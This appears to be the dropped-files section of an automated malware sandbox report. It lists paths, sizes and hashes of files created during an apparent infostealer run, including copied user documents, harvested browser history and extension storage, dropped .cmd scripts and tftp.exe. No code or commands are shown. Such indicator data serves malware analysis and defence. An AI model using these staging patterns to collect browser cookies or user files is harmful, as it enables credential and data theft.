C:\Users\Admin\AppData\Local\Temp\Alfa\Extensions\edge\Default\Local Storage\leveldb\LOG

Filesize
331B

MD5
ee24a100ba6442092c084a80e1f87f2d

SHA1
7590647ec05ec21f94ae5b8695c3b0f8822d9ffe

SHA256
1c70e386d523466871a9358d5f56ec4b6339d37dd4c8d473ed0ae02449d3d58c

SHA512
fbeabeece6d2069cb191e82bec509e56e696694fc3576d6c4ab902a19b565de7b5c38df78ecff693e5f6beb7ff1c5780f02db67bef991bf673395f088243009b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Alfa\Extensions\edge\Default\Local Storage\leveldb\LOG.old

Filesize
293B

MD5
4c3b6ba3339aeb7d4bc61c65b3b61329

SHA1
354abf4c490a99ff4c34eb39c6bc6f1ed5388135

SHA256
afac31edc7a6b0a8a47302dd7e5a523d088e3095437431c295172ad6195c2299

SHA512
861c75c85e55948e0f671d8d5eabdbf05e4471fc41d23d80fffc060ea242a19f4887ab8b994766f5bfb499c431ad06a39abd4312cb2ed556ddf24535a481b60f

Download Submit
C:\Users\Admin\AppData\Local\Temp\Alfa\Files\Documents\ConnectDisconnect.docx

Filesize
16KB

MD5
b916faa2310f2eaf9c8ef96b5c1230cb

SHA1
b91b08b09ea5df43eb45e81afa877176fdc341c3

SHA256
44ac1b8a2ee2dffd86d0c612b91b3c68e7b4feb1d2d1fa0955fd3678b4cffd4c

SHA512
d45a17716403825994839ba69ef137eda004fbda41fe74963f511a122597ac89e49bc6e9908f28e65057adaeb0e1b812adc12f9695d0b6c90c11f62f05b1a0a3

Download Submit
C:\Users\Admin\AppData\Local\Temp\Alfa\Files\Documents\ImportRestart.xls

Filesize
976KB

MD5
938f124a17791b98f027831d54723bb6

SHA1
4ee94f9b1398d311af179589ea1cc9cbef60efc9

SHA256
d9a7f9b38514e8941096aa73816ce4a040c1ad29745ffe9b0dfac832df044a5e

SHA512
e2a3dbf326496d84ead3922d8c512ddcc934fd524caf18b7f693fb029166b422ed6374b0f8e1afce08c12174f63f3bc0f19f528f8335c8b86326285020ef0d6d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Alfa\Files\Documents\JoinSelect.xlsx

Filesize
11KB

MD5
66a85abedb4d7e4a0444f5f371a74211

SHA1
4dbcdd30a9d824ebae590f1ed1c30486986261ef

SHA256
6f2771cfd5ec3a8dcf681253dbd2865f5e02f7cc2fcf2cd1db0996420adea649

SHA512
8d21a7c9f46cf5566d011d339d992d9d3862010f99d65ffe5a353077088fbd9025b80d2504ee5502d519544cc18e6c7ebbceae36d26f6086e86c9dbd7c9688d3

Download Submit
C:\Users\Admin\AppData\Local\Temp\Alfa\Files\Documents\OpenConvertTo.docm

Filesize
3.3MB

MD5
7bdc371fb81bccd97ec1771e857036a0

SHA1
c1387f426bdbf6fcf4c3a92d874e4a9cb02e7509

SHA256
7e6df44ecddd041a3fb7030d1b2c03570a38a5ddf2ffabd344f1b7a35fc20722

SHA512
8fe517dc9add970e942f7da1b4cc920ab096fb1de0901c15ca316adf735f261e822b4aab406db989f9a1df58eeb8cef2635b413fe5695ccef8df6539a7b59296

Download Submit
C:\Users\Admin\AppData\Local\Temp\Alfa\Files\Documents\OutReceive.xlsx

Filesize
2.2MB

MD5
5f46ddff1c8f508e58e6dd2e600a381d

SHA1
bfdbbc3e629e8411861369888a848c735d9ca77b

SHA256
b1a580fd28e3017f02a93d86627a420779af1c057b87d9104b5d760dc272547e

SHA512
ed57dd279a385cfb39151fc346b1715c605ef2a8acb51421725ca306500e8046f5f59f9dd091a93d1f67445f1513bdf0984412bd46c1c640fbd332b690a761fb

Download Submit
C:\Users\Admin\AppData\Local\Temp\Alfa\Files\Documents\PopRequest.xlsx

Filesize
10KB

MD5
b97ebcda0514b0e01df1bcff714fb07a

SHA1
c1c98f6e30bf890271d9bbdfc555d66664443afc

SHA256
a456ef6f71cc3198ddbdba3e85e23f16f7532eaca195efba8d956780011e0de5

SHA512
c0365b4ea34b1c768ae2ed4fb0a01b6a7e7074c0550da140ec9cc7f45b06cef7ed84eadd9e4879993f50bb5b48f0798d4a4178e76a0b46b799d03a9a12d413b3

Download Submit
C:\Users\Admin\AppData\Local\Temp\Alfa\Files\Documents\SendResume.pdf

Filesize
2.4MB

MD5
14adaec14aac389c0824ee120db997e5

SHA1
312b7b79e0db826d1b04611ec7aad54354c0a27e

SHA256
06b25eb174b05b0e8863609a2badabad2f572697289dace0dcda38ef76049833

SHA512
a018c6ed1d3d2623d3ba6a9a251c211f89012a5dac86ee7f253fec3245ebbfd326ebdb265c80ff27c6d6e966accff3e1c9886646d97573f92e58c73e8ef3dce5

Download Submit
C:\Users\Admin\AppData\Local\Temp\Alfa\Files\Downloads\BackupSuspend.vst

Filesize
873KB

MD5
84602832907002c67158d81f0172c974

SHA1
dd838774e929ea1db2569b9bb477a8da51fad48d

SHA256
77b50413871e0170be4344de325578d3bc6f24a2730c6ef7ddeaa92c053633d7

SHA512
77b489c52d45eeb320742b48f33559bc3708ca5721ca6cacf9324eacf575ece86b794adb813a7199a310fa9b09f1af2492001c78d516fc7d19b5036b8d781197

Download Submit
C:\Users\Admin\AppData\Local\Temp\Alfa\Files\Downloads\TracePublish.txt

Filesize
604KB

MD5
0e95ea017ac5e195a568b7479a055c4f

SHA1
df1d89dfff10c011e21844d1a76aba700a5ca2c8

SHA256
59087eaac3770bc355301cfd2d0b61991e248999cace8e00333218d39a00df81

SHA512
f7a59e9caf0f3c33aa5ae31377592bbdd21fed9b55d7a10bf754cef26eb4c97617997c60bc8508bf07af5496c9d52871e864dcc1f8790a46c7af0cde357c6865

Download Submit
C:\Users\Admin\AppData\Local\Temp\Alfa\Files\Pictures\JoinBackup.jpeg

Filesize
376KB

MD5
06a479667f745181b408665e57fda3bf

SHA1
b95595a27bb6c9225dd3f4a5e6a729b9ccc8c965

SHA256
c916b5ef64158cfe4c9b40ecd4ed8e040fb153029f46d80d41258be7e50418ef

SHA512
dedd6505298455c4c859608f1ac2bf8fc7907fdcbe741c91d892cb60751659cfc9a3413c06f299b8470a23d797a84c60889fbcb26556664321d2d650bed59860

Download Submit
C:\Users\Admin\AppData\Local\Temp\Appreciate.cmd

Filesize
15KB

MD5
cf4a755aa7bfb2afae9d7b0bae7a56cb

SHA1
f6fe9d88779c3277c86c52918fc050c585007d93

SHA256
2853c2f9d3db94ea67286c50a896f30c0eb4914763d8d74b450ac3faeea2c5d2

SHA512
bc185b1886fe438418b282df25d234b92f80386697bdd743d568849de572776439d0336263b3b9ffc4d6994e79316747e4483067ead4c5b8ec5ed09f6f592967

Download Submit
C:\Users\Admin\AppData\Local\Temp\Bukkake.cmd

Filesize
33KB

MD5
8fe00be344a338f96b6d987c5c61022d

SHA1
978e4cf1ca900c32d67dde966d5b148d25cec310

SHA256
6b938320d9a1d9dc9ff337ec6c5284519ff1838bd1c7b5c0c1f093f0bba2d399

SHA512
216dd64298e1315d307072b557351ee06c949816f868153b178ecc1f809cd099aae7e90a9af4c1a6826e9315b7a35843e9b7121f89baccf4cedab754b51784e8

Download Submit
C:\Users\Admin\AppData\Local\Temp\ISV5406.tmp\saBSI.zip

Filesize
515KB

MD5
f68008b70822bd28c82d13a289deb418

SHA1
06abbe109ba6dfd4153d76cd65bfffae129c41d8

SHA256
cc6f4faf4e8a9f4d2269d1d69a69ea326f789620fb98078cc98597f3cb998589

SHA512
fa482942e32e14011ae3c6762c638ccb0a0e8ec0055d2327c3acc381dddf1400de79e4e9321a39a418800d072e59c36b94b13b7eb62751d3aec990fb38ce9253

Download Submit
C:\Users\Admin\AppData\Local\Temp\ISV5406.tmp\saBSI\installer.exe

Filesize
22.8MB

MD5
6c677d78bb106707c70b39ee3d23f828

SHA1
1e9c0e5bfe8773e6ef7f26d16418af0b14f14e32

SHA256
bf369f1388d8baf1ed6edf4b4b4a0858b4b38599b4d01fb5190788680c1ad1a8

SHA512
0319e8c8c939daeae44b7ca84c525ce8af9a5783169521e2800cb41ac1f2aced69119aa415eef40def146ee94e3f7163ceb698a96a7f20ad65006ef21093c06d

Download Submit
C:\Users\Admin\AppData\Local\Temp\PLA6A54.tmp

Filesize
255B

MD5
c3d2ba313784cdf896b8ee80212aee8a

SHA1
9dd5d0b9812854061f3a232aeea82f07987cc879

SHA256
e228cb7cb48543b3e8be1f1ea409957ca69e81ff727e78a2d8f5e5f361f94dcc

SHA512
2954ed3b9684d046394564be445a6e5bf455d99ea00d629898ed3271a70df99ce79efc331b1e1c1d2ecda8f27cdc562b8494fed43097455a02dc0b10d02214f9

Download Submit
C:\Users\Admin\AppData\Local\Temp\RealtekDrivers\Browsers\Admin\Firefox\5l9wod5l.default-release\history.txt

Filesize
1KB

MD5
d1f5234ef24639596c8cc515be6f6c63

SHA1
c4dcd39684e829cdbf8515d0e22180ebaf9612fb

SHA256
4c9a7348665397fed487c47194ac985f67650cf6c2295f934f6e2f70d36842be

SHA512
cef99e2cc627293946e7baef8ad1adf076d7ad8562fc1ff5bd45534564472162979dd8008e645bcd998ba34683a59ffce73650604c13bcecacb5b98ae9551325

Download Submit
C:\Users\Admin\AppData\Local\Temp\RealtekDrivers\Browsers\Admin\Firefox\5l9wod5l.default-release\history.txt

Filesize
3KB

MD5
d131ac0190670bdf631628d77fbb3f0e

SHA1
60e95b91679370dc75ea4df84cc0c2371137edda

SHA256
b707a23afcc327019ca31fc45dbd5879139db53e835bf593e600ec3bbe8dd25f

SHA512
300c5557956ca752e19fd88aa7a6d8df59e0cfb1c0b2a15489c35843970b660a33dbf0072b9f398c7827164a1e85ee317982249679c7f32c98449267fecf02d7

Download Submit
C:\Users\Admin\AppData\Local\Temp\RealtekDrivers\Extensions\chrome\Default\Local Storage\leveldb\000003.log

Filesize
121B

MD5
ff54834058853a909bf4ad26291968b7

SHA1
5e3e87db9750456d4c29634e99ad114f4f3210a7

SHA256
a5bef65c9f232b4c87ce04659d57dd92119d568f3fb970e115929653915ac39a

SHA512
3bd547cec1b702e68f8292297c9a31ffd123b749fbf4713e9623acf3dcdad83b8d1db1d9caa34f3d47e045388fb56b2fc93f7b99d7587f0723caf655f7d7a6ed

Download Submit
C:\Users\Admin\AppData\Local\Temp\RealtekDrivers\Extensions\chrome\Default\Local Storage\leveldb\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Temp\RealtekDrivers\Extensions\chrome\Default\Local Storage\leveldb\LOG

Filesize
329B

MD5
53dcb6346186b25601e3828a418ca21b

SHA1
0226e5a338828e8c0fed78ebdd92af729eceb1af

SHA256
3371ddb3eeadff1c005ebb98bbe226d2e0bfbce4a7230e8c06f50be959192265

SHA512
86fa66b23f61dd87e1bf176c6e3bc63799952419dfc75abba18b647abcc9ced9f9d2f920c9967944df2179619f2f376fbcbd35d7d2abea3e40f0d8665195bc67

Download Submit
C:\Users\Admin\AppData\Local\Temp\RealtekDrivers\Extensions\chrome\Default\Local Storage\leveldb\MANIFEST-000001

Filesize
41B

MD5
5af87dfd673ba2115e2fcf5cfdb727ab

SHA1
d5b5bbf396dc291274584ef71f444f420b6056f1

SHA256
f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

SHA512
de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_y1wb5hql.sg0.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\msdtadmin\_C473332B-3F29-472E-882C-4FACF253364F_\PkgB454.cab

Filesize
33KB

MD5
72620b4a73c94b4b94e6b19f8b65f1d7

SHA1
d35b5c1d09d8b33a31486ff16fee49947af50698

SHA256
5d503b43698d54d0f13202f1addc49b2dbb7732170fa3d44063c5e574aa2918b

SHA512
7bfa1f3901db69604645e20002ee9059a8168321c65bcefc769e182cb8b39fc2b8f319d1e669a75d1f0cca07d8e8d3e0cf90dc6681fad81800f27b0300f7077b

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsh8495.tmp\inetc.dll

Filesize
21KB

MD5
d7a3fa6a6c738b4a3c40d5602af20b08

SHA1
34fc75d97f640609cb6cadb001da2cb2c0b3538a

SHA256
67eff17c53a78c8ec9a28f392b9bb93df3e74f96f6ecd87a333a482c36546b3e

SHA512
75cf123448567806be5f852ebf70f398da881e89994b82442a1f4bc6799894e799f979f5ab1cc9ba12617e48620e6c34f71e23259da498da37354e5fd3c0f934

Download Submit
C:\Users\Admin\AppData\Local\Temp\tftp.exe

Filesize
95KB

MD5
461ed9a62b59cf0436ab6cee3c60fe85

SHA1
3f41a2796cc993a1d2196d1973f2cd1990a8c505

SHA256
40fe74d3a1116ed8ca64c62feb694327a414059eeaef62c28bc5917e2e991b3d

SHA512
5f6f7528a05175cc1b8d927feaba56a90c70e8fe42c7ea01999cf328d28b8596de0df8d6d3fbc6e4fe5d89e36982871a59493dcb8d633fb942a35a217e4aedef

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpaddon

Filesize
479KB

MD5
09372174e83dbbf696ee732fd2e875bb

SHA1
ba360186ba650a769f9303f48b7200fb5eaccee1

SHA256
c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f

SHA512
b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

Filesize
13.8MB

MD5
0a8747a2ac9ac08ae9508f36c6d75692

SHA1
b287a96fd6cc12433adb42193dfe06111c38eaf0

SHA256
32d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03

SHA512
59521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\40371339ad31a7e6.customDestinations-ms

Filesize
5KB

MD5
68ccde702df9f10923f7fe24645cb4f1

SHA1
f3cbcd0d3314cbfda1e4155df68b3e0de1864935

SHA256
eca57b3de861862f977b05e63ecedb719edac14346fda375e96ae70ea696be6b

SHA512
f01a3f608f73c80e885b5135399c4d70ad2f3270e35e2c479a040fa71eed2437e2891b25f2f99ffb66ecaf219fe2671efaeceb8808fe3a2ae665ce652f17d629

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms

Filesize
19KB

MD5
be0204f7db92621bed785a7b12a611d6

SHA1
6a4518c484b12b434399f75ddfd9e8cb444d79e6

SHA256
163c6d1d2eb8874857ab9e95d4cab0c855c27f0040ab3e79b7b9ad36dd4305c3

SHA512
78d122ab8732f6c07f7db301c337dd2285d67da7af0f23ebab6c6cc2ab1eb775d7830efc7d41e39525754d7dc448c59daaae78d1370f39c395a9c42c558b90c3

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\CYOWHQD6V4GTD4MN6XZX.temp

Filesize
20KB

MD5
6a81a81ff5af64ee785089c3b1707eb0

SHA1
ebc40dcc752e19f24c3aaa90f2b81e084d1543e0

SHA256
f781b13e075cfddd06df7b2e7cfba4fefe63dd479787c888519ce3205c859bfb

SHA512
27274f544fb39d49215443f56917bc8b1ba3b5f74f0787b9d3720a46cc11ce06bb2dc021e642a904dd4d81865bcc10db73e8ef3b7768add7efd7bab3524be031

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\AlternateServices.bin

Filesize
6KB

MD5
5b7832161822cc2fec5e681530a2a19c

SHA1
7d5141ebe1a7ef7c0bda926ac557a313643abdb8

SHA256
51536cbd57a5414b39aaafc7ad6d3b290bb06bc6d5155e78de1c3d6b4416b4a0

SHA512
8dc772e24a02c823cbacb9b0c462e43f511fc090342d137dc26efacb37d3777c71afbc98bdf377f3267b5ee6f5998ab43829bc0d4e7d14a305a56ccce9f04958

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\AlternateServices.bin

Filesize
12KB

MD5
0e21b353cd7c2bccaa24f4ef26f4cb12

SHA1
e3eb02b5acea109897523392844eecce5fa5dee2

SHA256
35ee4cc6aab4a8af8172d89e9ee4e1c4d4236dccb4c5e6e59cf084f59e69fef4

SHA512
536d32345be9474815bc346721602b461e901cbfcd28c255bb7c5496d5f6c3d64afc462d0e111eadad9021569540b70c747510995305906946448ecff8a70bcf

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\bookmarkbackups\bookmarks-2024-11-27_11_NI9CendXNAkPMHJi29hZpw==.jsonlz4

Filesize
1014B

MD5
f17260f6e11781116fc7b81fd6923b8b

SHA1
6edd220093b30ae7330c255fddb0442196e1053d

SHA256
afb9b0b1e7b1a826e88b70c5912df30ba8a404e6c06bf0a0c67f2debe60d8482

SHA512
1c5c1676507e78b20df1174ee88172c7a35911cf254be40881c18e3fb58c9ff6355f4637da38585e3e70ce5c0674c08c932eb18b2e6de62be6b73f03a86477c1

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\cert9.db

Filesize
224KB

MD5
53eb97cb8102a74ca4083ad6811b97a3

SHA1
ffccfd7ce97a7edfa50356ef82b7a6fe4bab28de

SHA256
b70b3ec806eb9863f7b961a28977593617f3aa1f82ebe944bac52a51b0b21a1d

SHA512
b983c7b52bd344a28d7ac7524c3d89f477dec69c7b6dcfc211a8951fd7b004cc680d28325f07e15921f0d26c45f2495ad7e505ac251bed2bf98d258975334bce

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\cookies.sqlite

Filesize
512KB

MD5
760dd4cb32e23a4733df3a2dacd214c3

SHA1
1765c7998cadd6c0d50259049b251c7a1e52c8ab

SHA256
ec7919662b32ec67f8853b3c51dbd8b9709888564b64dc75105f47c560d7dcbf

SHA512
0efc4a6045b6c986bb8fb5b087247412fe83c2fefe9b47193e09e27241a11283f369d45b9efa80b7920355368f4366808d4ae54e8900af7e5213647250fe01c4

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\crashes\store.json.mozlz4

Filesize
66B

MD5
a6338865eb252d0ef8fcf11fa9af3f0d

SHA1
cecdd4c4dcae10c2ffc8eb938121b6231de48cd3

SHA256
078648c042b9b08483ce246b7f01371072541a2e90d1beb0c8009a6118cbd965

SHA512
d950227ac83f4e8246d73f9f35c19e88ce65d0ca5f1ef8ccbb02ed6efc66b1b7e683e2ba0200279d7ca4b49831fd8c3ceb0584265b10accff2611ec1ca8c0c6c

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\datareporting\glean\db\data.safe.tmp

Filesize
42KB

MD5
893123fb200f0ac5771430a3cb8a83fb

SHA1
273ef1f3b392852e6c5a29dd1c52d2bf7dc6ceed

SHA256
2c6c8f09b53733236b278e812990da7e0c84c47dd0a51e7920d0e62a51e5da77

SHA512
9d9310bcc7826a0982d00b4ec5d63f61b5d6f921852d0a14718eae0dfe71f35aa1eac332c5add2d3d3fa6a768335f7bd6cbdab34d08bfd6a95cf03089facced3

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\datareporting\glean\db\data.safe.tmp

Filesize
5KB

MD5
3ce60b4712cb8e320aa01be0319fdbfc

SHA1
c36708d962078b25326410b839f47118828a7914

SHA256
bf8e48a90b5e66765f02bf8592c5dffa0335f8f54866e1eb2ebcb446c420f007

SHA512
f3d2b38a0bd13f228d513cf1a1e295df5d2593c34ae66252171b20100d25fb6ae7665b39d73550d562a82ac9e730758ca3f5545635122eeba569a734f48b59c5

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\datareporting\glean\db\data.safe.tmp

Filesize
42KB

MD5
602cda898bfdd0048cc4ea0d833c6019

SHA1
4c2908038ff89dc7a2f9ba96214ef2266df470f1

SHA256
206ecc9cbe1b4c79b125cc06eb96c21467ffb04ad7bbe2e98bac61f09a106432

SHA512
7848cba584a7dbeeea1fd6d3fbea3a15be85d13969dfe405baf0a55fca5a427d3ba98e68a42b07d4d95f7d6c20cd5142cbc4309657ad6868985abf4be85fe9a9

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\datareporting\glean\db\data.safe.tmp

Filesize
5KB

MD5
65fbc21739ce8066bebe9af1d1f1dd6f

SHA1
7c674e278327b453a12182202e2a1f02be2b35d5

SHA256
2a37cb189bc449062b3a8a1a5bb6d4388b03a97dc13f2537b1ab4797e23ff347

SHA512
fddfb2af57bf5c1a54bfdc9537537f5c101dd142f8e92aeae82157b8929a9ea1c0742d8aca21067e726783307b192c861fa5cecf65c83c801441c0c2cf0c01bf

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\datareporting\glean\db\data.safe.tmp

Filesize
26KB

MD5
0b5784942a0c22d1bf4f45e6ababb152

SHA1
becabcd9aecd3eaa3d9e22161f2d181c97f75c64

SHA256
9403deeb1889dcd0c9dabb00b44f9409fa9c070e009fdc28768612f657e0f6c2

SHA512
3c81e642a6605f5160e96b8b928c23ea23e70146bd979fb8f501dd1a2e4cd23d66fdeadf8a87cd0919bc2091afbf8d35502e9a4473758f03282181433a520386

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\datareporting\glean\db\data.safe.tmp

Filesize
84KB

MD5
c816d8465341846aba99af7da72defc9

SHA1
0676a2e51e4fbc68e82098279ea7690ef02b77f0

SHA256
5c6e4f80c7073a90794b4a104548073b6099573c807f55c1356dc3533f3c742e

SHA512
2092e867fea20d3b44fb3a892fcc95ca30618020d0b6c7613155b690b54f16ca0c030e4d898802985515b91a811c38940f6bff62cb5450905066a7a9dbd65875

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\datareporting\glean\db\data.safe.tmp

Filesize
26KB

MD5
ce9061fe212b1b4fa182568e523434dd

SHA1
6ef2db838c42fdc8407df99dd670794a9cba74de

SHA256
a6f2d6ff3dea278231b473a631990c02e57190a8f751cba7655dedda1e29b265

SHA512
e8bb048ca4e3e58a2ad74bc3b76dbbe35a3e4d40ae0009705037ba87233c195c2bdc91935b571dc2fdf6387b5c1c97d8dfc096732f08571c96b704570c215890

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\datareporting\glean\db\data.safe.tmp

Filesize
6KB

MD5
8d0a14ee79a55904758932c94ccf2e37

SHA1
4616df943c573c72d56c8bef6defc431ef295075

SHA256
41fcdb7a8df585ccd86f8b7d303363951ff2cc72f27b881ef9765bdcb65dd573

SHA512
d50f72a477daedbd45a6e86621782c1e734c2cbe5a86f6eb53105c012d005ed6c235594937d56682b9a31fa565974a538e5a93ef6b9b42bb8f7df7a21596f718

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\datareporting\glean\db\data.safe.tmp

Filesize
7KB

MD5
e9dd3048f0ca40c1265fc41e870a3729

SHA1
a2bf7d7f98268f9f207ecdea9d1dd2127a032134

SHA256
e5324cdd9cf995c96f85b274ef6321212a7cfcefaed516f166a8a2063aa63cfc

SHA512
cf0905430bf71c727b26bdda7f602b330508496fc00256aebcd1e7f9c4d4f3b3f7fc9d04e0237e8c6f45891b75ac15d38ab35e24398e75bdc6f86c3c2e2fde89

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\datareporting\glean\events\events

Filesize
5KB

MD5
82e6159a2c48865e86ee13d07314d8e4

SHA1
a397ae3c83d45220041cf209b28f68f66a06ed99

SHA256
0fdcbc9547334438f3dd69deccf60e06ca63f008907505c2d478ad287a1b0f68

SHA512
41fc9cee0d9efbcf6454c1e078562cd294c67a83451dfbfff48b3f33d29a9560c344804a96e8a8138d4e53085aa243efe1e10c7a984c4e74a0b1ccf38975abd1

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\datareporting\glean\pending_pings\0055283f-f284-4462-9c6f-e4bf74c2062c

Filesize
963B

MD5
e0fc706a373971ff6d38cb9942ca4afd

SHA1
849af855c0993fc4a33986d3c33dfea8d20423d9

SHA256
ad609e6c4a31e1fe6cd7395e0fea9de4176585da44c19ec1dbf9a36ee4f914e6

SHA512
90ab6343c297532ef7338064e046e0cdba99db9120431d1b803955ee2b34465f56bc8ad351a67b10a838aee971180b2aa64efec7f57d68870df53bce8a0ba62a

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\datareporting\glean\pending_pings\1499162f-3af0-482e-954f-e923c104d7ab

Filesize
671B

MD5
02adb59189d8f2a852dc8880784a0625

SHA1
adcb1ac3e7f500454a2a144398ebbc09408d7368

SHA256
ac4d0e2e544d8ee1c8aa7e4213049c8cec8b09494bb0051a1d97ae6bdbdf7e36

SHA512
a103af78601150589155691f6b9a5793c0675128a57d10c27a54892070e550839ef110dd8c9ebc6809fa2c55910c58f38e8a7de537a72950fbe59189a9750965

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\datareporting\glean\pending_pings\19a14b21-a4d3-46e7-bd90-2944bbce40e1

Filesize
1KB

MD5
56e510a33d76baf3746c8e6ffdb21128

SHA1
34f539755724791c688f85e11ec4176574950763

SHA256
4dcb63cb7750a1ac45376ae89c96e532ad9d2c45df90fd090327a82c5702c55d

SHA512
35c7edd925a4468460edb6a881a56affaec8bd737abd5ea8a43b2e58911d2e1e3cf17e11655f720d5a41a84f6708f3dc332f47fa909d64df58643e43b051e401

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\datareporting\glean\pending_pings\1dfdc942-ed4e-4ad9-ba7c-9ca31b89a47b

Filesize
734B

MD5
52da0e6ebb21ee400cb4c4a9e5e39323

SHA1
d62e4afc4852081a944111ca7a0a66c62eccedc0

SHA256
f4248c9e045a4a412e6d4030e3e1191d048f955933acc744856188fedabafb01

SHA512
f97011b3a11afccd3d3a8c8def889e62b64eba5b11441a9727f077f8defabf997dec80a987532ec4b3a6ef81e29f26767d0922e6df78c5a625892d30e85e14f1

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\datareporting\glean\pending_pings\5c769b38-c2b9-4ee9-8b75-55a232703170

Filesize
982B

MD5
e16b47f5bf2cb32c9bdd87575873ba69

SHA1
3c0522106ab19d4bf55d5d0b730d6c7ebcb2d282

SHA256
0dfad0b30a3621e8091a8cb5c96ddd702432bdd8d701bc46c088ead5540b3c0c

SHA512
9f5d22dd32ea8630724001026bf5561e41fe710e5015f38471a0fc77fb273c4c7a144af1e9ea4895b77e8171279bb76a1fe004a080558fbc2d8619519283058e

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\datareporting\glean\pending_pings\67f2e8aa-dfa7-4fbe-a4fe-13a36574fa11

Filesize
735B

MD5
fe177b0404223d86060cbb79443c9dca

SHA1
70af86fb6aa555880eb4e78fd1bbb82005fe334a

SHA256
bbc8a60787a73e9832fb3d87e5edcdec6bc30126546912b29507f662e2ea4926

SHA512
468120491d9a95fa4c7f7f4c03d50141869f54c2c7f8d7ffbc0a19f6ce23e797abbf0b0a799643617366c9b3e742504132bf0c953fac01be8d42c185c2e6176e

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\datareporting\glean\pending_pings\73bcd16b-80f2-4414-a2a5-29da320db43e

Filesize
25KB

MD5
91542a9bfeee47951b04d7b00cbeebd3

SHA1
9fcf1cd8a067742a4ccd9e334d3d3b52808995dd

SHA256
f70f88c8206aca04e22201f96763a8af67a943ff48ddec834613ff4124064a54

SHA512
a4c1cf075004ccee2f82af4e37b7bfa1b26e34c280bb4ab759d6faca9e747147148fcfb8b77f13e4dfa28d5f3e7a8be7ff308c7dd87c67a59357db34dd43eba5

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\datareporting\glean\pending_pings\bd8f4ae7-343a-4290-978b-1ecf851d1847

Filesize
20KB

MD5
5d55fdd362f6e6ebc6ac2839381721eb

SHA1
5cb4df0ea78b590bb2b9781e0b0371d0cdc1bd00

SHA256
156d19165d5f89e9205effcc2d0f793f3135444bdd367658d8701fd2c17f47cf

SHA512
